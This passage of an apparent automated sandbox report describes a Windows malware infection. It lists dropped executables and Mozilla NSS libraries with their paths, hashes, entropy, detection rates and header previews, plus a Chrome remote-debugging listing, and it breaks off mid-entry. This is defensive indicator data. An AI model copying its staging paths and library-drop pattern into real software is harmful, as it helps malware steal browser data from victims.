SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2aff342b40.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1789440
Entropy (8bit):	7.943914577475808
Encrypted:	false
SSDEEP:	49152:EWDzR3kVKyvwxbdJ60Lsv33hf+EsV7i7EO7Hf:EA+rkhJ60YJcV69b
MD5:	C524F231DBE4C55A328876F06E2A82D1
SHA1:	8D4C24359D577FCBC818158FC79554169690273B
SHA-256:	9561F2E19612F381DFBE538BA59F4F6F4CEFE5D0D0F26F0B7FA1FCD095B9F708
SHA-512:	1020928371C8423FA4724A3D603D7B2823F97EAE93190CC1337D95993ACAB9507BB3F361026D1757ACB64C26E553BA17E6CB91020E0A525ACF2B24AA167328A3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........................PE..L...O./g.....................$.......Ph...........@...........................h...........@.................................M.$.a.....$.......................$..................................................................................... . ..$......b..................@....rsrc.........$......r..............@....idata ......$......t..............@... ..)...$......v..............@...wkrmqwho......N......x..............@...fzxxpvmm.....@h......(..............@....taggant.0...Ph.."...,..............@...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2819584
Entropy (8bit):	6.493391639764589
Encrypted:	false
SSDEEP:	49152:Uel2vJ/sO2P+lvS2VPHcLDEfvpTQFz1EvY:Uel2vNH2P+l62a/rF
MD5:	739F477149675DE9EA6D954BB446FFAE
SHA1:	ACA9016270132680F49490050E36BE6B3D890528
SHA-256:	DE661C359365B8B0C0287FDC01881B208744ACA0341A21BC271970975BF91307
SHA-512:	49FBD92EC2E08DAA9BFE3653C14CF346E716C875B9D2593420FB55431B568CF9295D8EE65A98864EF90C1F591550A1CF3A5DEA3CB4F285E657723F84712A977D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. ........................+.....W.+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...jajeyrhy...........:..............@...xqskffqo. ...`+....................@....taggant.@....+..".................@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4419072
Entropy (8bit):	7.983678269787075
Encrypted:	false
SSDEEP:	98304:xnKBRfe+3kcUqby3hCkwlCSZX+4YVIudgUa/E+3:xKvGwkcUMyRCk0CSZO3yum/E
MD5:	3540F08B37B30B6C554E0E5FF05A8E97
SHA1:	1CA146FE61B66A73900F1008F8267EC5554413C2
SHA-256:	562AB7435CBDE0C5528A05F60CE959FA9B428D3378F4D0F5B22F48EB09FE13E6
SHA-512:	9CA4C49A620C2CB06A8C334D1CDCE999579F3DCD472B10E7227C54089EFE9E68844BFC0E2D34E0B72558E714B01094EEAA849B30566B1D7E7461FE928F1ED201
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<g...............(..I...s..2............J...@.......................... ......'.C...@... ............................._.q.s...........................X....................................................................................... . ..p......x'.................@....rsrc ......p.......'.............@....idata ......q.......'.............@... ..9...q.......'.............@...bgrcdjci..... ........'.............@...aezraviv.............HC.............@....taggant.0......."...LC.............@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1856000
Entropy (8bit):	7.947180240460252
Encrypted:	false
SSDEEP:	49152:X7RH9sKSpzdqOsY1RE/M2GTclwGdiJtgF:Xv3uqOs2E/xisF
MD5:	6013BD0A6461EE49410F7032CA69EA31
SHA1:	FD8A0DF19BC65D276D470CDADE8A9E51B3046B4D
SHA-256:	74B6AFA1CA9ACBFEDF4F2914C5FA98A7BA622022C0017E8B4426500263719617
SHA-512:	1CCB67495DEC03213414FF1525BD7C444F060771CE4F625CAEDA98748E096A666E2F278971719BEEC8C27EE76811B52A8C24428D8EB67F9089F33AFE8C866406
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g.............................pI...........@...........................I...........@.................................\...p....p.............................................................................................................. . .`.......b..................@....rsrc........p.......r..............@....idata .............t..............@... ..*..........v..............@...ackgsmri....../......x..............@...nodwasaq.....`I......,..............@....taggant.0...pI.."...0..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.359869554365605
Encrypted:	false
SSDEEP:	48:SfNaoQrFnTEQrRfNaoQ0QffNaoQwhMQw0fNaoQgO0UrU0U8QX:6NnQJTEQRNnQ0Q3NnQ5QJNnQL0UrU0UP
MD5:	7071270CF0400DEBA17153BA378E60A3
SHA1:	78D8703627C6D655A4D9E2D2D1D53FCB04EF6D70
SHA-256:	AD65FAB30726D04EB21D6C262C45828C373E1E1B5D314741244F0EC099F69A64
SHA-512:	46AF2F4CEEC1CF222A84B05C087D250FFA568A09CB65630D8F9B9793C721AA4D094ABAF01C0FAC6650519CFF424F60A348ADC3AA694A445DCAE98F7D27544310
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/006642730C0173572FC6924107DEBB98",.. "id": "006642730C0173572FC6924107DEBB98",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/006642730C0173572FC6924107DEBB98"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/FDD4C923E4D869F1481705051ED46004",.. "id": "FDD4C923E4D869F1481705051ED46004",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/FDD4C923E4D869F1481705051ED46004"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	923136
Entropy (8bit):	6.594070874460461
Encrypted:	false
SSDEEP:	12288:gqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgavT3:gqDEvCTbMWu7rQYlBQcBiT6rprG8aL3
MD5:	1B2A1D49F92876B02C7B1BD1EC1EA860
SHA1:	ADECD3CA9C41F08A9FC03CC4B2A78E91BA1C458C
SHA-256:	22D27367946299F0AF143B358FD3883BE24CDDEA3C40CAB15F6F96B906BCA976
SHA-512:	E27F8255F1B7BEE54070C61B35F954F838246CB033BF6472C5D2F5B6EC6CF73602B55B6DA73595F388E138486889463EDCA90CE79AF2B0597DEA899CA4A17E95
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....@g.........."..........f......w.............@..........................p......2.....@...@.......@.....................d...\|....@..........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc.......@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4419072
Entropy (8bit):	7.983678269787075
Encrypted:	false
SSDEEP:	98304:xnKBRfe+3kcUqby3hCkwlCSZX+4YVIudgUa/E+3:xKvGwkcUMyRCk0CSZO3yum/E
MD5:	3540F08B37B30B6C554E0E5FF05A8E97
SHA1:	1CA146FE61B66A73900F1008F8267EC5554413C2
SHA-256:	562AB7435CBDE0C5528A05F60CE959FA9B428D3378F4D0F5B22F48EB09FE13E6
SHA-512:	9CA4C49A620C2CB06A8C334D1CDCE999579F3DCD472B10E7227C54089EFE9E68844BFC0E2D34E0B72558E714B01094EEAA849B30566B1D7E7461FE928F1ED201
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<g...............(..I...s..2............J...@.......................... ......'.C...@... ............................._.q.s...........................X....................................................................................... . ..p......x'.................@....rsrc ......p.......'.............@....idata ......q.......'.............@... ..9...q.......'.............@...bgrcdjci..... ........'.............@...aezraviv.............HC.............@....taggant.0......."...LC.............@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1856000
Entropy (8bit):	7.947180240460252
Encrypted:	false
SSDEEP:	49152:X7RH9sKSpzdqOsY1RE/M2GTclwGdiJtgF:Xv3uqOs2E/xisF
MD5:	6013BD0A6461EE49410F7032CA69EA31
SHA1:	FD8A0DF19BC65D276D470CDADE8A9E51B3046B4D
